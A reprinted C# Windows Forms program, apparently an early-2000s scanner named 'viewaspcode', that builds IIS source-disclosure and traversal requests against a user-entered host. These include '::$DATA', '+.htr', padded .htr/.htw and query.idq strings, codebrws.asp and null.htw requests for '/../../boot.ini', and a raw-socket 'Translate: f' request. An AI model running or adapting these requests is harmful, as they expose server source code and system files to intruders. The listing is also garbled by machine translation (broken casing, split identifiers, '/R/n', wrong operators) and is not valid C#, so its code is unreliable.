A C# application that scans for ASP source code vulnerabilities

Source: Internet
Author: User

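The source code of the main part of the program follows. The listing has been altered by machine translation (keyword casing, inserted spaces, and escape sequences printed as "/R/n"), so it is not valid C# as shown.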
//--------------------------------------------------------------------------
//
// File name: form1.cs
//
// Description: master form
//
// Date: 2001/1/3
//
// Author: bigeagle@163.net
// Http://bigeagle.yeah.net
//
// History: 2000/1/3 version 0.9
//
// TODO: the "Translate: f" method seems to be faulty. Revise it after obtaining the relevant HTTP information.
//
//-------------------------------------------------------------------------

Namespace findbug
{
Using system;
Using system. drawing;
Using system. collections;
Using system. componentmodel;
Using system. winforms;
Using system. Data;
Using system. net;
Using system. IO;
Using system. text;
Using system. net. Sockets;

/// <Summary>
/// Summary description for form1.
/// </Summary>
Public class form1: system. winforms. Form
{
/// <Summary>
/// Required designer variable.
/// </Summary>
Private system. componentmodel. Container components;
// The fields below are the controls and menu items that initializecomponent () creates.
// Status bar; btngo_click writes progress text into it.
Private system. winforms. statusbar barstatus;
// "clear" button, wired to btnclear_click.
Private system. winforms. Button btnclear;
// Multiline box that receives the response text; hidden until the first request.
Private system. winforms. textbox txtresult;
// "show me" button, wired to btngo_click.
Private system. winforms. Button btngo;
Private system. winforms. Label label3;
// Drop-down of request variants; filled by initform () and read by index in btngo_click.
Private system. winforms. ComboBox cbomethod;
// Path of the file to request; btngo_click reads it as strurl.
Private system. winforms. textbox txtfilename;
Private system. winforms. Label label2;
// Server prefix ("http ://..." as printed); btngo_click reads it as strserver.
Private system. winforms. textbox txtserver;
Private system. winforms. Label label1;
// Menu items: File (new / save / separator / exit) and Help (about).
Private system. winforms. menuitem mnuexit;
Private system. winforms. menuitem menuitem1;
Private system. winforms. menuitem mnunew;
Private system. winforms. menuitem mnuabunt;
Private system. winforms. menuitem mnuhelp;
Private system. winforms. menuitem mnusave;
Private system. winforms. menuitem mnufile;
Private system. winforms. mainmenu mainmenu1;

// Constructor: builds the controls, then fills the method drop-down.
Public form1 ()
{
//
// Required for Windows Form Designer support
//
Initializecomponent ();

// Populate the drop-down and select its first entry (see initform).
Initform ();

}

// Releases the form: calls the base class Dispose first, then disposes the
// designer's component container.
Public override void dispose ()
{
Base. Dispose ();
Components. Dispose ();
}

// Creates every control and menu item, sets text/position/size, attaches the
// click handlers, and adds the controls to the form.
// NOTE(review): the "about" item is wired to mnuabunt_click, but the handler
// defined in this listing is named mnuabount_click; the names do not match as printed.
// NOTE(review): no Click handler is attached to mnusave in this method.
Private void initializecomponent ()
{
// Instantiate the component container, menu items and controls.
This. components = new system. componentmodel. Container ();
This. mnusave = new system. winforms. menuitem ();
This. mnunew = new system. winforms. menuitem ();
This. cbomethod = new system. winforms. ComboBox ();
This. btngo = new system. winforms. Button ();
This. menuitem1 = new system. winforms. menuitem ();
This. mnufile = new system. winforms. menuitem ();
This.txt Server = new system. winforms. Textbox ();
This. mnuhelp = new system. winforms. menuitem ();
This. btnclear = new system. winforms. Button ();
This. label2 = new system. winforms. Label ();
This. label1 = new system. winforms. Label ();
This. mnuabunt = new system. winforms. menuitem ();
This. barstatus = new system. winforms. statusbar ();
This. mainmenu1 = new system. winforms. mainmenu ();
This. mnuexit = new system. winforms. menuitem ();
This.txt result = new system. winforms. Textbox ();
This. label3 = new system. winforms. Label ();
This.txt filename = new system. winforms. Textbox ();
// File > save (no handler attached here).
Mnusave. Text = "save ";
Mnusave. Shortcut = system. winforms. Shortcut. ctrls;
Mnusave. Index = 1;
// File > new, handled by mnunew_click.
Mnunew. Text = "new ";
Mnunew. Shortcut = system. winforms. Shortcut. F2;
Mnunew. Index = 0;
Mnunew. Click + = new system. eventhandler (this. mnunew_click );
// Drop-down of request variants (items are added in initform).
Cbomethod. Location = new system. Drawing. Point (96, 56 );
Cbomethod. size = new system. Drawing. Size (121, 20 );
Cbomethod. tabindex = 4;
// "show me" button: starts the request in btngo_click.
Btngo. Location = new system. Drawing. Point (296, 56 );
Btngo. size = new system. Drawing. Size (75, 23 );
Btngo. tabindex = 6;
Btngo. Text = "show me ";
Btngo. Click + = new system. eventhandler (this. btngo_click );
// Separator inside the File menu.
Menuitem1.text = "-";
Menuitem1.index = 2;
// File menu and its four entries.
Mnufile. Text = "file (& F )";
Mnufile. Index = 0;
Mnufile. menuitems. All = new system. winforms. menuitem [4] {This. mnunew, this. mnusave, this. menuitem1, this. mnuexit };
// Server input, pre-filled with the URL scheme prefix.
Txtserver. Location = new system. Drawing. Point (96, 16 );
Txtserver. Text = "http ://";
Txtserver. tabindex = 1;
Txtserver. size = new system. Drawing. Size (100, 21 );
// Help menu with the single "about" entry.
Mnuhelp. Text = "Help (& H )";
Mnuhelp. Index = 1;
Mnuhelp. menuitems. All = new system. winforms. menuitem [1] {This. mnuabunt };
// "clear" button, handled by btnclear_click.
Btnclear. Location = new system. Drawing. Point (408, 56 );
Btnclear. size = new system. Drawing. Size (75, 23 );
Btnclear. tabindex = 8;
Btnclear. Text = "clear ";
Btnclear. Click + = new system. eventhandler (this. btnclear_click );
// Caption labels for the file-name and host-name inputs.
Label2.location = new system. Drawing. Point (224, 16 );
Label2.text = "file name :";
Label2.size = new system. Drawing. Size (72, 16 );
Label2.font = new system. Drawing. Font ("", 12 );
Label2.tabindex = 2;
Label1.location = new system. Drawing. Point (24, 21 );
Label1.text = "Host Name :";
Label1.size = new system. Drawing. Size (72, 16 );
Label1.font = new system. Drawing. Font ("", 12 );
Label1.tabindex = 0;
// Help > about; see the handler-name mismatch noted at the top of this method.
Mnuabunt. Text = "about ";
Mnuabunt. Shortcut = system. winforms. Shortcut. ctrla;
Mnuabunt. Index = 0;
Mnuabunt. Click + = new system. eventhandler (this. mnuabunt_click );
// Status bar along the bottom edge.
Barstatus. backcolor = system. Drawing. systemcolors. Control;
Barstatus. Location = new system. Drawing. Point (0,423 );
Barstatus. size = new system. Drawing. Size (568, 18 );
Barstatus. tabindex = 9;
Barstatus. Text = "ready ";
// Main menu: File and Help.
Mainmenu1.menuitems. All = new system. winforms. menuitem [2] {This. mnufile, this. mnuhelp };
// File > exit, handled by mnuexit_click.
Mnuexit. Text = "exit (& X )";
Mnuexit. Shortcut cut = system. winforms. Shortcut cut. altf4;
Mnuexit. Index = 3;
Mnuexit. Click + = new system. eventhandler (this. mnuexit_click );
// Result box: multiline, scrollable, hidden until btngo_click shows it.
Txtresult. Location = new system. Drawing. Point (16, 96 );
Txtresult. multiline = true;
Txtresult. scrollbars = system. winforms. scrollbars. Both;
Txtresult. tabindex = 7;
Txtresult. size = new system. Drawing. Size (536,312 );
Txtresult. Visible = false;
// Caption label next to the method drop-down.
Label3.location = new system. Drawing. Point (32, 56 );
Label3.text = "use ";
Label3.size = new system. Drawing. Size (56, 16 );
Label3.font = new system. Drawing. Font ("", 12 );
Label3.tabindex = 5;
// File-name input.
Txtfilename. Location = new system. Drawing. Point (304, 16 );
Txtfilename. tabindex = 3;
Txtfilename. size = new system. Drawing. Size (232, 21 );
// Form-level properties, then attach the menu and add the controls.
This. Text = "viewaspcode ";
This. startposition = system. winforms. formstartposition. centerscreen;
This. autoscalebasesize = new system. Drawing. Size (6, 14 );
This. Menu = This. mainmenu1;
This. clientsize = new system. Drawing. Size (568,441 );
This. Controls. Add (this. barstatus );
This. Controls. Add (this. btnclear );
This. Controls. Add (this.txt result );
This. Controls. Add (this. btngo );
This. Controls. Add (this. label3 );
This. Controls. Add (this. cbomethod );
This. Controls. Add (this.txt filename );
This. Controls. Add (this. label2 );
This. Controls. Add (this.txt server );
This. Controls. Add (this. label1 );
}

// Handler for the "about" menu item: shows the About dialog modally with this
// form as owner, then disposes it. The "about" type is not defined in this listing.
// NOTE(review): initializecomponent () registers a handler named mnuabunt_click,
// which differs from this method's name as printed.
Protected void mnuabount_click (Object sender, system. eventargs E)
{
About objabout = new about ();
Objabout. showdialog (this );
Objabout. Dispose ();
}

// Fills the method drop-down with 21 request variants and selects the first.
// The ORDER of the entries matters: btngo_click switches on selectedindex
// (0, 5, 8, 10-19 have dedicated cases, 20 takes the raw-socket path); for every
// other index the entry's text is appended verbatim to the requested URL.
// Each entry is either a suffix/encoding variation of the requested file name or
// the name of a server-side sample / search script. For a server operator these are
// the request shapes to look for in web logs.
// NOTE(review): the literals contain spaces and casing changes introduced by
// translation, so they are not the exact strings the original program used.
Private void initform ()
{
// Index 0: request the file unchanged.
This. cbomethod. Items. Add ("read directly ");
// Indexes 1-7: suffix / encoding variants (index 5 has its own case in btngo_click).
This. cbomethod. Items. Add (".");
This. cbomethod. Items. Add ("% 81 ");
This. cbomethod. Items. Add (": Data ");
This. cbomethod. Items. Add ("% 2e ");
This. cbomethod. Items. Add ("% 2e % 41sp ");
This. cbomethod. Items. Add ("+. htr ");
This. cbomethod. Items. Add ("//");
// Index 8: padded .htr request; index 9: backup-file suffix.
This. cbomethod. Items. Add ("longhtr ");
This. cbomethod. Items. Add (". Bak ");
// Indexes 10-19: sample and search scripts addressed by fixed paths in btngo_click.
This. cbomethod. Items. Add ("codebrws. asp ");
This. cbomethod. Items. Add ("Showcode. asp ");
This. cbomethod. Items. Add ("null. HTW ");
This. cbomethod. Items. Add ("qfullhit. HTW ");
This. cbomethod. Items. Add ("qsumrhit. HTW ");
This. cbomethod. Items. Add ("query. idq ");
This. cbomethod. Items. Add ("Search/qfullhit. HTW ");
This. cbomethod. Items. Add ("Search/qsumrhit. HTW ");
This. cbomethod. Items. Add ("iirturnh. HTW ");
This. cbomethod. Items. Add (". HTW ");
// Index 20: request sent over a raw socket with an extra header (see btngo_click).
This. cbomethod. Items. Add ("translate: F ");

This. cbomethod. selectedindex = 0;
}

// Handler for File > new: resets the server box to the scheme prefix and
// empties the file-name and result boxes.
Protected void mnunew_click (Object sender, system. eventargs E)
{
This.txt server. Text = "http ://";
This.txt filename. Text = "";
This.txt result. Text = "";
}

// Handler for the "clear" button: empties the result box only.
Protected void btnclear_click (Object sender, system. eventargs E)
{
This.txt result. Text = "";
}

// Handler for the "show me" button. Splits the entered file path into directory,
// base name and extension, builds one request string according to the selected
// drop-down index, sends it (get_http for indexes 0-19, get_socket_request for
// index 20) and puts the returned text into the result box.
// NOTE(review): the path is parsed BEFORE the input is validated. With an empty
// file name, or one without ".", the length passed to the second substring call
// below is negative, so the validation branch is never reached.
// NOTE(review): both network calls are made directly inside this handler, so the
// form does not respond until they return.
// NOTE(review): the controls are re-enabled only at the end of the method, with no
// try/finally. get_http catches its own exceptions; get_socket_request does not, so
// an exception there leaves the inputs read-only and the buttons disabled.
Protected void btngo_click (Object sender, system. eventargs E)
{

// Parse the URL
String strserver = this.txt server. text;
String strurl = this.txt filename. text;
Char [] Point = {'.'}; // defines the delimiter "."
Char [] line = {'/'}; // defines the delimiter "/"
String [] arrstring = strurl. Split (line );

// Obtain the full name of the ASP file (last "/"-separated segment)
String strfilename = arrstring [arrstring. Length-1];
// Find the path from the root directory (everything before the file name)
String strpath = strurl. substring (0,
Strurl. Length-strfilename. Length );

// Parse the full name of the file
Arrstring = strfilename. Split (point );
// Obtain the file extension (last "."-separated segment).
String strlast = arrstring [arrstring. Length-1];
// Calculate the file name without its extension and the separating "."
String strfirst = strfilename. substring (0,
Strfilename. Length-strlast. Length-1 );

// Make the inputs read-only and disable the buttons while the request runs
This.txt server. readonly = true;
This.txt filename. readonly = true;
This. btnclear. Enabled = false;
This. btngo. Enabled = false;

// Reject an untouched or empty server box, an empty file name, or a server
// string that does not start with the scheme prefix.
// NOTE(review): "=" and "|" are printed here where a comparison and a
// short-circuit OR would be expected; substring (0, 7) on a server string
// shorter than 7 characters would throw. Probably translation damage - confirm.
If (this.txt server. Text = "http: //" | this.txt filename. Text = ""
| This.txt server. Text. Trim () = "" |
This.txt server. Text. substring (0, 7 )! = "Http ://")
{
MessageBox. Show ("enter the correct host name and file name! ");
This.txt server. Focus ();
}
Else
{
This.txt result. Visible = true;
This.txt result. readonly = true;
This. barstatus. Text = "connecting host... ";

String strrequestfile;

// The case numbers are positions in the list built by initform ().
Switch (this. cbomethod. selectedindex)
{
Case 0: // read directly
Strrequestfile = strserver + strurl;
Break;
Case 5: // % 2e % 41sp - replaces the extension with an encoded form
Strrequestfile = strserver + strpath + strfirst
+ "% 2e % 41sp ";
Break;
Case 8: // longhtr - the entered URL followed by a long run of encoded spaces and ".htr"
Strrequestfile = strserver + strurl
+ "+ % 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20%"
+ "20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20%"
+ "20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20.htr ";
Break;

Case 10: // codebrws. asp - passes the entered path to a sample script
Strrequestfile = strserver + "/iissamples/ExAir/howitworks/codebrws. asp? Source ="
+ Strurl;
Break;

// NOTE(review): labelled Showcode. asp, but the path requested is the same
// codebrws. asp path as case 10; the entered file name is not used.
Case 11: // Showcode. asp
Strrequestfile = strserver + "/iissamples/ExAir/howitworks/codebrws. asp? Source ="
+ "/MSADC/.../boot. ini ";
Break;

Case 12: // null. HTW - passes the entered path as a query parameter
Strrequestfile = strserver + "/null. HTW? Ciwebhitsfile ="
+ Strurl + "% 20 & cirestriction = none & cihilitetype = Full ";
Break;
// Cases 13-18 use fixed script paths and a fixed file argument; the entered
// file name is ignored.
Case 13: // qfullhit. HTW
Strrequestfile = strserver + "/iissamples/ISSamples/OOP/qfullhit. HTW? "
+ "Ciwebhitsfile =/.../../boot. ini & cirestriction = none"
+ "& Cihilitetype = Full ";
Break;

Case 14: // qsumrhit. HTW
Strrequestfile = strserver + "/iissamples/ISSamples/OOP/qsumrhit. HTW? "
+ "Ciwebhitsfile =/.../../boot. ini & cirestriction = none"
+ "& Cihilitetype = Full ";
Break;

Case 15: // query. idq
Strrequestfile = strserver + "/query. idq? Citemplate =/.../../boot. ini"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20%"
+ "20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20.htx ";
Break;

Case 16: // search/qfullhit. HTW
Strrequestfile = strserver + "/iissamples/ExAir/search/qfullhit. HTW? "
+ "Ciwebhitsfile =/.../../boot. ini & cirestriction = none"
+ "& Cihilitetype = Full ";
Break;

Case 17: // search/qsumrhit. HTW
Strrequestfile = strserver + "/iissamples/ExAir/search/qsumrhit. HTW? "
+ "Ciwebhitsfile =/.../../boot. ini & cirestriction = none"
+ "& Cihilitetype = Full ";
Break;

Case 18: // iirturnh. HTW
Strrequestfile = strserver + "/IISHelp/IIS/MISC/iirturnh. HTW? "
+ "Ciwebhitsfile =/.../../boot. ini & cirestriction = none"
+ "& Cihilitetype = Full ";
Break;

Case 19: //. HTW - the entered URL followed by padding and a fixed query string
Strrequestfile = strserver + strurl
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20%"
+ "20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20"
+ "% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% running htw? "
+ "Ciwebhitsfile =/.../../boot. ini & cirestriction = none"
+ "& Cihilitetype = Full ";
Break;

// Every index without its own case (1-4, 6, 7, 9, 20): append the drop-down
// text to the URL.
// NOTE(review): this section has no Break, which C# requires even for the
// last switch section.
Default:
Strrequestfile = strserver + strurl + this. cbomethod. text;
}

// Show at most the first 50 characters of the request in the status bar.
This. barstatus. Text = "Send request :"
+ (Strrequestfile. length> = 50?
Strrequestfile. substring (0, 50)
: Strrequestfile)
+ "...";

String strresult;
// If it is not the translate: F method, you can directly send an HTTP request
If (this. cbomethod. selectedindex! = 20)
{
// Send an HTTP request directly
Strresult = get_http (strrequestfile );

This. barstatus. Text + = "complete. ";
// NOTE(review): presumably an empty-result test ("== """); the comparison
// operand is missing as printed. get_http returns "error:..." on failure, so
// an empty string only occurs for an empty response body.
Strresult = ""? "Not found! ": Strresult;
This.txt result. Text = strresult;
}
Else // translate: The F method requires a TCP/IP connection.
{
// Request text is built by hand and sent to port 80 over a raw socket;
// strrequestfile is not used on this path. "/R/n" is presumably a garbled
// CR LF escape. The file header's TODO flags this path as faulty.
String strrequest = "get" + strserver + strurl
+ "/R/nhttp/1.0/R/ntranslate: F/R/N ";
Strresult = get_socket_request (strserver, strrequest, 80 );
This. barstatus. Text + = "complete. ";
Strresult = ""? "Not found! ": Strresult;
This.txt result. Text = strresult;

}

}

// Restore button and Input
This.txt server. readonly = false;
This.txt filename. readonly = false;
This. btnclear. Enabled = true;
This. btngo. Enabled = true;

}

// Opens a TCP connection to the host named in a_strserver, sends a_strrequest plus
// a "connection: Close" header, and returns everything received as one string.
// a_strserver : server string including its 7-character scheme prefix
// a_strrequest: request text prepared by the caller
// a_intport   : TCP port to connect to
// Returns the response text, or "unable to connect to host " when Connect reports failure.
// NOTE(review): the socket is never closed or shut down in this method.
// NOTE(review): no receive timeout or size limit is set here, so a slow or very large
// response from the remote server stalls the caller or grows the string without bound.
Private string get_socket_request (string a_strserver, string a_strrequest, int32 a_intport)
{
// Set up variables and string to write to the server
// NOTE(review): the variable is named ASCII but holds the default encoding.
Encoding ASCII = encoding. default;
// "/R/n" is presumably a garbled CR LF escape - confirm against the original.
String get = a_strrequest + "connection: Close/R/n/R/N ";
// String get =
Byte [] byteget = ASCII. getbytes (get );
// NOTE(review): "[1, 256]" looks like translation damage for a 256-byte buffer - confirm.
Byte [] recvbytes = new byte [1, 256];
String strretpage = NULL;

// IPaddress and ipendpoint represent the endpoint that will
// Receive the request
// Everything after the first 7 characters is passed to the resolver, so a port
// or path typed after the host name would be included in the lookup.
IPaddress hostadd = DNS. Resolve (a_strserver.substring (7, a_strserver.length-7 ));
Ipendpoint ephost = new ipendpoint (hostadd, a_intport );

// Create the socket for sending data over TCP
Socket S = new socket (addressfamily. afinet, sockettype. sockstream,
Protocoltype. prottcp );

// Connect to host using ipendpoint; a non-zero result is treated as failure
If (S. Connect (ephost )! = 0)
{
Strretpage = "unable to connect to host ";
Return strretpage;
}

// Send the request text to the host
S. Send (byteget, byteget. length, 0 );

// Receive the page, loop until all bytes are received
Int32 bytes = S. Receive (recvbytes, recvbytes. length, 0 );
Strretpage = strretpage + ASCII. getstring (recvbytes, 0, bytes );

// Keep reading until Receive returns 0; the final pass appends nothing.
While (Bytes> 0)
{
Bytes = S. Receive (recvbytes, recvbytes. length, 0 );
Strretpage = strretpage + ASCII. getstring (recvbytes, 0, bytes );
}

Return strretpage;
}

// Requests a_strurl through the framework's web-request class and returns the
// response body as text, one line at a time joined by "/R/N " (presumably a garbled
// CR LF escape). Any exception is caught and returned as "error:" plus its message,
// so callers never see an exception and never get an empty string on failure.
// NOTE(review): the response, stream and reader are not closed in this method.
// NOTE(review): the loop ends when Peek () returns -1; on a network stream that may
// happen before the end of the body - verify. No size limit is applied to the response.
Private string get_http (string a_strurl)
{
String strresult;
// Created outside the try block, so a failure in Create is not caught below.
Httpwebrequest myreq = (httpwebrequest)
Webrequestfactory. Create (a_strurl );

Try
{
Httpwebresponse httpwresp = (httpwebresponse) myreq. getresponse ();
Stream mystream = httpwresp. getresponsestream ();

// Decode with the default encoding and collect the body line by line.
Streamreader sr = new streamreader (mystream, encoding. Default );
Stringbuilder strbuilder = new stringbuilder ();
While (-1! = Sr. Peek ())
{
Strbuilder. append (Sr. Readline () + "/R/N ");
}

Strresult = strbuilder. tostring ();
}
Catch (exception exp)
{
// Report the failure as text instead of propagating it.
Strresult = "error:" + exp. message;
}

Return strresult;

}

// Handler for File > exit: asks for confirmation with a yes/no box and closes
// the form only when the answer is yes.
// NOTE(review): "=" is printed where an equality comparison is expected.
Protected void mnuexit_click (Object sender, system. eventargs E)
{

If (MessageBox. Show ("are you sure you want to exit? "," Exit System ", MessageBox. yesno) = dialogresult. Yes)
{
This. Close ();

}
}

// Program entry point: starts the message loop with a new form1 as the main window.
// The ARGs parameter is not used.
Public static void main (string [] ARGs)
{
Application. Run (New form1 ());
}
}
}

 
